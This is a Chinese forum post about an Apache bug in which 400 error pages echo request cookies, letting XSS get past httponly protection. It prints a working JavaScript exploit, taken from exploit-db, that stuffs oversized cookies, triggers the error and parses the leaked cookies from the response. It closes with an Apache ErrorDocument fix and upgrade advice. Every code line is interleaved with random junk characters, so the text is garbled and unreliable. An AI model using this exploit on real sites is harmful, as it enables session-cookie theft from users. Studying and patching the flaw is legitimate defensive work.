很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。
0 V7 Z9 p4 r+ l' h6 ^. t8 a' G# I" ^; B' S
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
; f# G/ M. _2 a - ?! [1 U3 v/ Z( z$ v& F
Z( X7 {+ t1 B8 I// http://www.exploit-db.com/exploits/18442/
) Q/ ^9 }7 l4 Pfunction setCookies (good) {# h! P- {) t2 r$ a3 j* C
// Construct string for cookie value1 C5 a: E x9 g
var str = "";
G# S# m3 m/ L( c3 g& G% k$ \0 Ufor (var i=0; i< 819; i++) {
7 a5 c" P- ]% Z9 f' m- ~str += "x";
S/ J1 S1 [9 i' ?: t$ k; R2 i}' X* j8 g G) a1 f1 B( \4 B
// Set cookies
0 v$ i; M( F E7 ^for (i = 0; i < 10; i++) {
; r8 V9 A# ]3 {7 r8 R3 v// Expire evil cookie& ]4 J1 q! q* J3 [; N2 l, }
if (good) {
, u/ U6 c: H# t7 S, Mvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
; }& k {/ {/ l- i" y}
; \6 N+ } X9 M4 g7 a- \// Set evil cookie
5 Y. M9 {* p. F7 @. o( V8 F8 \0 v! H4 @else {
& Y1 T; b; H1 D. S& `4 N, [8 Rvar cookie = "xss"+i+"="+str+";path=/";
( S: h1 d# m7 ]5 Y# t}
& \# G7 Z1 ~4 ydocument.cookie = cookie;8 W! ?) Y; K" P m
}
6 {3 T* B* a( A. Q% B0 O. B}
; C) r4 M! O7 d$ f, \function makeRequest() {
" \6 a" o2 a1 x1 [5 u, [8 ssetCookies();
9 V9 s; @2 q7 ?6 s" ~function parseCookies () {" X) @9 Z0 d, ]0 [* g0 @% b$ ~* o
var cookie_dict = {};* s, r$ t$ ?# t, I F: R
// Only react on 400 status
) W: x" b7 | r: u6 hif (xhr.readyState === 4 && xhr.status === 400) {
2 q s- w$ T8 x0 p// Replace newlines and match <pre> content
' m7 u2 Y; Z. w8 ^2 P$ ]9 bvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);1 ~/ h2 h* f5 e: e* d& t: K- x
if (content.length) {9 |+ Z' m. v8 Q+ U: V( Q5 M3 N
// Remove Cookie: prefix
$ P" t+ x+ ?$ o% S3 gcontent = content[1].replace("Cookie: ", "");
3 F( u5 ^- K) J% N, F' l$ Z: _var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);8 _: M+ @# Y/ k" k ^2 m2 I4 J
// Add cookies to object- g6 y0 U- U- C$ n$ z4 {: E$ d; v
for (var i=0; i<cookies.length; i++) {% N% `2 s) H6 B5 ?' C
var s_c = cookies.split('=',2);
8 J; k3 A4 i+ K, t+ N- kcookie_dict[s_c[0]] = s_c[1];( [: n3 z( b7 x
}' l0 `8 S4 n' k, F. e
}
& ^% L! |2 D! B/ c d" b// Unset malicious cookies9 t/ s4 G0 J1 z F) i% @0 w/ l
setCookies(true);
3 u ]3 Y1 }; ?alert(JSON.stringify(cookie_dict));
" T7 U p! S% \8 W* p5 F: ^}% j6 _, _) p: d9 N! N
}
0 e H$ @- A' Y6 s9 a: }// Make XHR request! _8 c$ z& ?/ M' o5 V$ P
var xhr = new XMLHttpRequest();
" y4 s$ v- A+ X9 p) y; \! Z5 _xhr.onreadystatechange = parseCookies;
' _, V* ~8 e% H& m! _5 wxhr.open("GET", "/", true);$ E5 f! ^( e% E, t/ O- d! N
xhr.send(null);* Q6 E4 I; U$ N( q* D: e- O
}6 N4 k1 O& W. o4 R: _
makeRequest();. @0 [+ R! q, E: U
: r) h) ?3 { s5 }, ]
你就能看见华丽丽的400错误包含着cookie信息。
( v, q/ t- P2 D+ s9 B( K
# o; f0 o; i$ F0 L; Z% e, e5 g) T下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#9 n# u' Q( M, c
+ U0 t8 J2 }8 d$ O' [& r修复方案:
# H& `9 V- @! B. v+ |3 N: a
3 b8 G) R2 l9 c$ n/ r: ^Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下! S: |4 W, M! X4 ^2 o# H0 d9 S1 K
2 {8 v2 R7 X) W+ n! C4 e* X! P
In the event of a problem or error, Apachecan be configured to do one of four things,
# U$ Y" Z5 A! X# j5 l9 ?- a" M+ {) |" v
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
1 ^+ @+ b2 q5 N6 s; z/ X* W- I2. output acustomized message输出一段信息" s8 H1 t2 K9 l% O5 M
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
: \) _, V, a3 a: ^' s4. redirect to an external URL to handle theproblem/error转向一个外部URL
& e' X# ^; F+ f; N( ?. |; N' X9 W+ k6 Y* C+ z) Y
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容7 Y5 ?! ~' ^6 V1 `# q' j
. P* H' l5 f% _# C8 l0 VApache配置:
+ j4 T! k- Q" m9 B( X
9 N. k2 E, s4 ]# t8 [4 BErrorDocument400 " security test"2 K" f. l# M. u. o! v' c0 k
4 ]8 d0 X! e' o当然,升级apache到最新也可:)。0 m2 i1 y( U4 E5 P$ Y# i
4 ?& f+ j& ^" d
参考:http://httpd.apache.org/security/vulnerabilities_22.html
( g5 c% M3 E/ V9 ]/ N: B
' W" d0 g! F! ?! S& ` |
发表于 2013-4-19 19:15:43
收藏
支持
反对